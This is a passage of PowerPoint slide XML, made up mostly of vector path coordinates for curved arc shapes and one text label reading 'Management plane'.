                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1734197" y="2314460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1688706" y="2331974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1642249" y="2347518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1594878" y="2361082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546644" y="2372576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546644" y="2411438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1595615" y="2400338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1643735" y="2387193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1690954" y="2372068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1737220" y="2355011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782483" y="2336050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1826704" y="2315260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1869833" y="2292667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1911819" y="2268321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1952612" y="2242286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1992172" y="2214588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2030437" y="2185276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2067382" y="2154415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2102942" y="2122043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2137067" y="2088210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2169718" y="2052955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2200846" y="2016340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2230412" y="1978393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2258339" y="1939175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2284615" y="1898726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2309177" y="1857095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2331961" y="1814347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2352941" y="1770494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2372068" y="1725625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2389289" y="1679752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2404554" y="1632940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2417813" y="1585226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2429040" y="1536661"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2631440" h="2611754">
                <a:moveTo>
                  <a:pt x="2429040" y="1077937"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2417813" y="1029220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2404554" y="981341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2389289" y="934364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2372068" y="888339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2352941" y="843305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2331961" y="799312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2309177" y="756412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2284615" y="714641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2258339" y="674052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2230412" y="634707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2200846" y="596633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2169718" y="559879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2137067" y="524510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2102942" y="490550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2067382" y="458063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2030437" y="427101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1992172" y="397700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1952612" y="369900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1911819" y="343776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1869833" y="319341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1826704" y="296672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782483" y="275793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1737220" y="256781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1690954" y="239649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1643735" y="224459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1595615" y="211277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546644" y="200113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546644" y="239102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1594878" y="250659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1642249" y="264274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1688706" y="279882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1734197" y="297459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1778685" y="316941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1822107" y="338277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1864410" y="361416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1905558" y="386308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1945474" y="412915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1984146" y="441185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2021484" y="471055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057476" y="502488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2092045" y="535419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2125141" y="569810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2156726" y="605599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2186749" y="642759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2215146" y="681228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2241893" y="720940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2266912" y="761860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2290165" y="803948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2311603" y="847140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2331174" y="891387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2348827" y="936637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2364524" y="982853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2378189" y="1029970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2389797" y="1077937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2429040" y="1077937"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2631440" h="2611754">
                <a:moveTo>
                  <a:pt x="2631160" y="1305775"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2630309" y="1259039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2627769" y="1212354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2623540" y="1165758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2617622" y="1119314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2610002" y="1073073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2600693" y="1027074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2589695" y="981379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2577007" y="936028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2562618" y="891082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2546540" y="846582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2528773" y="802589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2509316" y="759129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2488171" y="716267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2465324" y="674065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2440787" y="632548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2414562" y="591781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2381796" y="624166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2407805" y="666013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2432024" y="708609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2454452" y="751878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2475077" y="795794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2493924" y="840295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2510967" y="885329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2526207" y="930846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2539669" y="976782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2551328" y="1023086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2561196" y="1069721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2569273" y="1116609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2575547" y="1163713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2580030" y="1210983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2582722" y="1258354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2583624" y="1305775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2582722" y="1353210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2580030" y="1400581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2575547" y="1447850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2569273" y="1494955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2561196" y="1541843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2551328" y="1588477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2539669" y="1634782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2526207" y="1680718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2510967" y="1726234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2493924" y="1771269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2475077" y="1815769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2454452" y="1859686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2432024" y="1902955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2407805" y="1945551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2381796" y="1987384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2414562" y="2019769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2440787" y="1979015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2465324" y="1937499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2488171" y="1895297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2509316" y="1852434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2528773" y="1808975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2546540" y="1764982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2562618" y="1720481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2577007" y="1675536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2589695" y="1630184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2600693" y="1584490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2610002" y="1538490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2617622" y="1492250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2623540" y="1445806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2627769" y="1399209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2630309" y="1352524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2631160" y="1305775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0904601" y="4683404"/>
            <a:ext cx="1754505" cy="7912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13715" marR="5080" indent="-501650">
              <a:lnSpc>
                <a:spcPct val="114199"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Management  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>plane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467391" y="3776344"/>
            <a:ext cx="2631440" cy="2613025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2631440" h="2613025">
                <a:moveTo>
                  <a:pt x="249377" y="623824"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="216611" y="591439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190373" y="632256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165836" y="673811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142989" y="716076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121843" y="758977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102387" y="802474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84620" y="846531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68541" y="891070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54152" y="936066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41465" y="981468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30467" y="1027214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21158" y="1073251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13538" y="1119543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7620" y="1166037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3390" y="1212672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="850" y="1259408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1306207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="850" y="1352994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3390" y="1399730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7620" y="1446364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13538" y="1492859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21158" y="1539151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30467" y="1585188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41465" y="1630934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54152" y="1676336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68541" y="1721332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84620" y="1765871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102387" y="1809927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121843" y="1853425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142989" y="1896325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165836" y="1938591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190373" y="1980145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216611" y="2020951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249377" y="1988566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223354" y="1946694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199136" y="1904060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176707" y="1860740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156083" y="1816773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137236" y="1772234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120192" y="1727149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104952" y="1681581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91490" y="1635594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79832" y="1589227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69964" y="1542554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61887" y="1495602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55613" y="1448435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51130" y="1401114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48437" y="1353680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47536" y="1306207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48437" y="1258722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51130" y="1211287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55613" y="1163967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61887" y="1116799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69964" y="1069860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79832" y="1023175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91490" y="976807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104952" y="930821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120192" y="885253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137236" y="840181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156083" y="795629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176707" y="751662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199136" y="708342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223354" y="665708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249377" y="623824"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2631440" h="2613025">
                <a:moveTo>
                  <a:pt x="1084529" y="2373630"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1036281" y="2362111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="988910" y="2348534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="942454" y="2332964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="896962" y="2315426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852474" y="2295995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809053" y="2274709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="766749" y="2251608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="725601" y="2226767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="685685" y="2200211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647014" y="2172004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="609676" y="2142185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573684" y="2110816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="539127" y="2077948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506018" y="2043620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474433" y="2007882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="444411" y="1970798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="416013" y="1932406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="389267" y="1892757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364248" y="1851901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340995" y="1809889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319557" y="1766760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299986" y="1722589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282333" y="1677416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266636" y="1631276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252971" y="1584223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241376" y="1536319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202133" y="1536319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213347" y="1584960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226606" y="1632762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241871" y="1679651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259092" y="1725599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278218" y="1770557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299199" y="1814474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321983" y="1857298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="346544" y="1898992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="372821" y="1939505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400748" y="1978787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430314" y="2016798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="461441" y="2053475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494093" y="2088794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528218" y="2122690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="563778" y="2155113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600722" y="2186025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="638987" y="2215375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678548" y="2243124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719340" y="2269210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761326" y="2293594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="804456" y="2316226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="848677" y="2337066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="893940" y="2356053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="940206" y="2373160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="987425" y="2388311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1035545" y="2401493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084529" y="2412619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084529" y="2373630"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2631440" h="2613025">
                <a:moveTo>
                  <a:pt x="1084529" y="201295"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1035545" y="212458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="987425" y="225640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="940206" y="240830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="893940" y="257962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="848677" y="276974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="804456" y="297853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761326" y="320522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719340" y="344957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678548" y="371081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="638987" y="398881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600722" y="428282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="563778" y="459244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528218" y="491731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494093" y="525691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="461441" y="561060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430314" y="597814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400748" y="635889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="372821" y="675233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="346544" y="715822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321983" y="757593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299199" y="800493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278218" y="844486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259092" y="889520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241871" y="935545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226606" y="982522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213347" y="1030401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202133" y="1079119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241376" y="1079119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252971" y="1031151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266636" y="984034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282333" y="937818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299986" y="892568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319557" y="848321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340995" y="805129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364248" y="763041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="389267" y="722122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="416013" y="682409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="444411" y="643940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474433" y="606780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506018" y="570992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="539127" y="536600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573684" y="503669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="609676" y="472236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647014" y="442366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="685685" y="414096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="725601" y="387489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="766749" y="362597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809053" y="339458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852474" y="318122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="896962" y="298640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="942454" y="281063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="988910" y="265455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1036281" y="251841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084529" y="240284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084529" y="201295"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2631440" h="2613025">
                <a:moveTo>
                  <a:pt x="2037029" y="2399284"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2004390" y="2366899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1962188" y="2392540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919224" y="2416403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1875574" y="2438501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1831289" y="2458834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1786407" y="2477401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1740992" y="2494191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1695081" y="2509215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1648752" y="2522474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1602041" y="2533967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1555026" y="2543695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1507718" y="2551646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1460207" y="2557830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1412544" y="2562250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1364767" y="2564904"/>
                </a:lnTo>
